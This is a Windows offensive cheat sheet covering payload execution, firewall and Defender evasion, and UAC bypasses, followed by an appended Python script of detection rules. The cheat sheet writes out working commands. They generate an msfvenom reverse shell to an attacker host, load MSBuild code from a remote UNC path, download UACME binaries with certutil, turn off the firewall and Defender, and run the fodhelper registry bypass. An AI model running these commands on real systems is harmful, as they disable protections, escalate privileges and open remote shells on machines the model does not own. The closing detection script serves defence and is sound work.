Execution
If you cannot execute an exe file, try these options:
- Execute a HTA shell
- Execute it as a DLL:
msfvenom -p windows/exec -f dll CMD=calc.exe -o calc.dll
C:\rundll32.exe calc.dll,doesntmatterhere
- Rename a .exe into a screen saver .scr file and execute it via rundll32:
copy payload.exe p.scr
C:\Windows\system32\rundll32.exe desk.cpl,InstallScreenSaver p.scr
- Use nested executions through trusted applications:
C:\payload.exe
C:\Windows\system32\cmd.exe /c C:\payload.exe
C:\Windows\system32\cmd.exe /c cscript.exe \windows\system32\SyncAppvPublishingServer.vbs ".;Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL payload.exe'[ -Verb RunAs]"
// With the last argument (-Verb RunAs), a UAC dialog pops up, but with a blue banner because the program to execute is signed by Microsoft.
- Try to execute (one-liner) scripts which run interpreted code or can create new processes.
- Use MSBuild.exe.
- Use this CSharp template.
- Add C# code in the code section.
- Or:
msfvenom -p windows/shell_reverse_tcp LHOST=$attacker LPORT=80 -f csharp
- Or:
- Execute it on the target with msbuild.exe file.xml.
- Tip: the code could be downloaded remotely (UNC path):
<Code Type="Class" Language="cs" Source="\\10.10.10.10\bla.cs">
- C:\windows\system32\cmd.exe is blocked? Try C:\windows\SysWOW64\cmd.exe!
- Powershell.exe is blocked? Try the other architecture's copy:
C:\Windows\SysWOW64\WindowsPowerShell\...\powershell.exe
C:\Windows\sysnative\WindowsPowerShell\...\powershell.exe
Windows firewall / netsh
Check firewall state
netsh advfirewall show currentprofile
netsh advfirewall show state
If the firewall is active, list the configuration:
netsh advfirewall show config
Example of how to add an exception to the firewall via the command line as an administrator:
C:\Windows\temp> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
or
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off
or whitelist your own IP (PowerShell):
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
Open a port:
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=$localWindowsIp localport=2222 action=allow
Windows Defender
Detect whether Defender is active:
sc query windefend
Deactivate Windows Defender:
sc config WinDefend start= disabled
sc stop WinDefend
Same thing in PowerShell:
Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Get-MpComputerStatus
UAC User Account Control
See Windows security fundamentals for more information.
Another UAC bypass with fodhelper.exe. In an (admin) cmd:
- Add an empty DelegateExecute value, which makes fodhelper fall back to the alternative key (the next one):
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
- Set the registry key which fodhelper.exe will use as the alternative:
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
- Open C:\Windows\System32\fodhelper.exe
UACME
~70 methods to bypass UAC in a single binary. Open it directly in Visual Studio, remove the macro #KUMA_STUB in global.h, then build it.
certutil.exe -urlcache -split -f "http://$NTPSRV/Akagi32.exe" Akagi32.exe
Akagi32.exe 31 cmd.exe
certutil.exe -urlcache -split -f "http://$NTPSRV/Akagi64.exe" Akagi64.exe
Akagi64.exe 61 cmd.exe
Try various method IDs. The GitHub page has a (collapsed) list of all bypass methods.
SDCLT bypass
- Open a session in meterpreter. Background the session.
- Use windows/local/bypassuac_sdclt and set the backgrounded session and run the bypass.
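As an added example (not from the original post), a small Python triage script that runs detection rules over Sysmon-style events for the techniques listed above: the fodhelper ms-settings registry write followed by a fodhelper.exe launch, Defender being disabled via sc or Set-MpPreference, the firewall being switched off with netsh, the desk.cpl screensaver trick, and the SyncAppvPublishingServer.vbs proxy. The event tuples, rule names and field layout are constructed for this example and are not real telemetry.

```python
import re

# Constructed Sysmon-style events (not real telemetry): (event_id, image, detail).
# Event ID 1 = process creation (detail is the command line),
# Event ID 13 = registry value set (detail is the target object).
SAMPLE_EVENTS = [
    (1, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c cscript.exe \windows\system32\SyncAppvPublishingServer.vbs"),
    (13, r"C:\Windows\System32\reg.exe", r"HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"),
    (1, r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    (1, r"C:\Windows\System32\sc.exe", "sc config WinDefend start= disabled"),
    (1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    (1, r"C:\Windows\System32\netsh.exe", "netsh advfirewall set allprofiles state off"),
    (1, r"C:\Windows\System32\rundll32.exe", "rundll32.exe desk.cpl,InstallScreenSaver p.scr"),
    (1, r"C:\Windows\System32\netsh.exe", "netsh advfirewall show state"),  # benign read-only query
]

# Each rule: (rule name, required event id, case-insensitive regex over the detail field).
RULES = [
    ("uac_fodhelper_registry", 13, r"\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\"),
    ("defender_service_disabled", 1, r"\bsc(\.exe)?\s+(config\s+windefend\s+start=\s*disabled|stop\s+windefend)"),
    ("defender_pref_disabled", 1, r"Set-MpPreference\s+-Disable\w+\s+\$true"),
    ("firewall_all_profiles_off", 1, r"advfirewall\s+set\s+allprofiles\s+state\s+off"),
    ("scr_via_rundll32_desk_cpl", 1, r"rundll32(\.exe)?\s+desk\.cpl,InstallScreenSaver"),
    ("appv_vbs_proxy_exec", 1, r"SyncAppvPublishingServer\.vbs"),
]


def match_rules(events):
    """Return (rule name, image) for every event that matches a rule, in log order."""
    hits = []
    for event_id, image, detail in events:
        for name, rule_event, pattern in RULES:
            if event_id == rule_event and re.search(pattern, detail, re.IGNORECASE):
                hits.append((name, image))
    return hits


def fodhelper_sequence(events):
    """True when the ms-settings handler key is written and fodhelper.exe starts afterwards.
    A fodhelper launch on its own is normal; the write-then-launch order is the signal."""
    key_written = False
    for event_id, image, detail in events:
        if event_id == 13 and re.search(RULES[0][2], detail, re.IGNORECASE):
            key_written = True
        elif event_id == 1 and key_written and image.lower().endswith("\\fodhelper.exe"):
            return True
    return False


if __name__ == "__main__":
    for name, image in match_rules(SAMPLE_EVENTS):
        print(f"{name:28} {image}")
    print("fodhelper write-then-launch sequence:", fodhelper_sequence(SAMPLE_EVENTS))
```

The registry rule keys on the HKU path so it also fires when the write comes from PowerShell or a script rather than reg.exe; the read-only netsh query is deliberately left unmatched to show the rules do not flag ordinary firewall checks.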